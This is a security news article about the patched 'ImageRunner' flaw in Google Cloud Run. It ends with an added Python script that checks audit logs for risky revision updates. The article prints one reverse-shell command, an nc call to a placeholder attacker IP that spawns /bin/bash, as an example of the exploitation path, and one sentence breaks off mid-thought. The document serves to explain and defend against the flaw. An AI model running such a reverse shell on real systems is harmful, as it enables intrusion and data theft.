A significant security vulnerability in Google Cloud Platform (GCP) was recently discovered, potentially allowing attackers to access private container images stored in Google Artifact Registry and Google Container Registry.
Dubbed "ImageRunner," the vulnerability has been patched, but it highlights a serious privilege escalation risk, exposing sensitive cloud resources to unauthorized access.
The ImageRunner Vulnerability
According to Tenable Research, the flaw primarily affected Google Cloud Run, a fully managed service for running containerized applications in a serverless environment.
The issue stemmed from how Cloud Run handled permissions during container deployment. Users with edit permissions on Cloud Run revisions (run.services.update and iam.serviceAccounts.actAs) could exploit this weakness to access private container images without having the typically required registry permissions, such as Storage Object Viewer or Artifact Registry Reader.
When deploying a Cloud Run service, a new revision is created, representing a specific version of the deployed service. During this process, Cloud Run uses a service agent with elevated permissions to pull container images from registries, making it a potential target for exploitation.
Exploitation Method
An attacker exploiting this vulnerability could:
- Control an identity with run.services.update and iam.serviceAccounts.actAs permissions.
- Update an active Cloud Run service and create a new revision.
- Specify any private container image within the same project.
- Inject malicious instructions as arguments or commands.
For example, an attacker could reference a private "ncat" image and execute the following command to establish a reverse shell:
nc [attacker_ip] [port] -e /bin/bash
Once executed, this would give the attacker access to the container, allowing them to inspect its contents, extract secrets, or exfiltrate sensitive data.
The attack was possible because Cloud Run's service agent (
The "Jenga®" Effect in Cloud Security
Tenable Research likened this vulnerability to a "Jenga®" scenario, where cloud services stack on top of each other, inheriting security risks from the underlying layers. If one core service is compromised, everything built on top of it becomes vulnerable.
This pattern has been observed across major cloud providers, posing a significant challenge for security teams trying to safeguard cloud environments.
Google's Security Fix
To mitigate this vulnerability, Google introduced a critical security update:
- The principal creating or updating a Cloud Run resource must now have explicit permission to access the container images being deployed.
- Specifically, when using Artifact Registry, the principal must hold the Artifact Registry Reader (roles/artifactregistry.reader) IAM role on the project or repository containing the container images.
The fix was fully rolled out to production on January 28, 2025, after advance notifications were sent to affected Project, Folder, and Organization owners in November 2024.
Recommendations for Cloud Admins
Organizations using Google Cloud Platform (GCP) should:
- Enforce least privilege IAM policies to limit unnecessary permissions.
- Ensure that only authorized identities with appropriate registry permissions perform Cloud Run deployments.
- Monitor Cloud Run revision updates for suspicious activity.
- Consider additional security controls for container deployments.
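As an added example (not code from the article, Tenable, or Google), the following Python check turns the fix described above and the monitoring recommendation into something a cloud admin can run against their own exports: it walks Cloud Audit Log entries for Cloud Run revision updates and, against a project IAM policy, reports every update whose caller holds no registry-read role, the exact combination the January 2025 change now rejects. It also notes when the update overrides the container's command or args, since the article names those as the injection vector. The audit-log method names, the simplified entry shape, the list of registry-read roles, and all log lines and policy bindings are assumptions constructed for this example; verify the method names against your own project's logs.

```python
"""Added example: flag Cloud Run revision updates by callers lacking registry read rights."""
import json

# Audit-log method names that create a new revision through an update.
# Assumed for this example; confirm against real Cloud Audit Log entries.
UPDATE_METHODS = {
    "google.cloud.run.v1.Services.ReplaceService",
    "google.cloud.run.v2.Services.UpdateService",
}

# Roles that let a principal pull images directly (assumed list, project scope).
REGISTRY_READ_ROLES = {
    "roles/artifactregistry.reader",
    "roles/artifactregistry.repoAdmin",
    "roles/artifactregistry.admin",
    "roles/storage.objectViewer",
    "roles/owner",
}

# Constructed sample log lines: a benign update by a deployer that holds the
# reader role, an update by a principal that does not and also overrides the
# entrypoint, and an unrelated IAM event that must be ignored.
SAMPLE_LOG_LINES = [
    json.dumps({"protoPayload": {
        "serviceName": "run.googleapis.com",
        "methodName": "google.cloud.run.v1.Services.ReplaceService",
        "authenticationInfo": {"principalEmail": "deployer@example-project.iam.gserviceaccount.com"},
        "resourceName": "namespaces/example-project/services/web",
        "request": {"spec": {"template": {"spec": {"containers": [
            {"image": "us-docker.pkg.dev/example-project/app/web:1.2.3"}]}}}},
    }, "timestamp": "2025-01-15T10:00:00Z"}),
    json.dumps({"protoPayload": {
        "serviceName": "run.googleapis.com",
        "methodName": "google.cloud.run.v1.Services.ReplaceService",
        "authenticationInfo": {"principalEmail": "contractor@example.com"},
        "resourceName": "namespaces/example-project/services/web",
        "request": {"spec": {"template": {"spec": {"containers": [
            {"image": "us-docker.pkg.dev/example-project/internal/secrets-tool:latest",
             "command": ["/bin/sh"], "args": ["-c", "example-override"]}]}}}},
    }, "timestamp": "2025-01-15T10:05:00Z"}),
    json.dumps({"protoPayload": {"serviceName": "iam.googleapis.com",
                                 "methodName": "SetIamPolicy"}}),
]

# Constructed project IAM policy in the real {"bindings": [...]} shape.
SAMPLE_IAM_POLICY = {"bindings": [
    {"role": "roles/run.developer",
     "members": ["serviceAccount:deployer@example-project.iam.gserviceaccount.com",
                 "user:contractor@example.com"]},
    {"role": "roles/artifactregistry.reader",
     "members": ["serviceAccount:deployer@example-project.iam.gserviceaccount.com"]},
]}


def principals_with_registry_read(policy):
    """Return bare identities (type prefix stripped) holding any registry-read role."""
    members = set()
    for binding in policy.get("bindings", []):
        if binding.get("role") in REGISTRY_READ_ROLES:
            members.update(m.split(":", 1)[1] for m in binding.get("members", []))
    return members


def revision_updates(log_lines):
    """Yield (principal, service, containers) for each Cloud Run revision update."""
    for line in log_lines:
        payload = json.loads(line).get("protoPayload", {})
        if payload.get("serviceName") != "run.googleapis.com":
            continue
        if payload.get("methodName") not in UPDATE_METHODS:
            continue
        containers = (payload.get("request", {}).get("spec", {}).get("template", {})
                      .get("spec", {}).get("containers", []))
        principal = payload.get("authenticationInfo", {}).get("principalEmail", "")
        yield principal, payload.get("resourceName", ""), containers


def find_risky_updates(log_lines, policy):
    """Return one finding per container deployed by a caller without registry read access.

    Before the fix such a caller still got the image pulled by the Cloud Run
    service agent; after it the call should fail, so a hit is worth review either way.
    """
    readers = principals_with_registry_read(policy)
    findings = []
    for principal, service, containers in revision_updates(log_lines):
        if principal in readers:
            continue
        for c in containers:
            findings.append({
                "principal": principal,
                "service": service,
                "image": c.get("image", ""),
                "overrides_entrypoint": bool(c.get("command") or c.get("args")),
            })
    return findings


if __name__ == "__main__":
    for finding in find_risky_updates(SAMPLE_LOG_LINES, SAMPLE_IAM_POLICY):
        print(finding)
```

Feed real entries from a log sink export (one JSON object per line) and the output of a project-level get-iam-policy call in place of the constructed samples. The check is deliberately conservative: it treats only project-scope role bindings as read access, so a principal granted the reader role on an individual repository will show up as a finding and can be whitelisted after review.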
This vulnerability is a reminder that cloud security requires constant vigilance, especially against complex privilege escalation paths that may not be immediately apparent in multi-service architectures.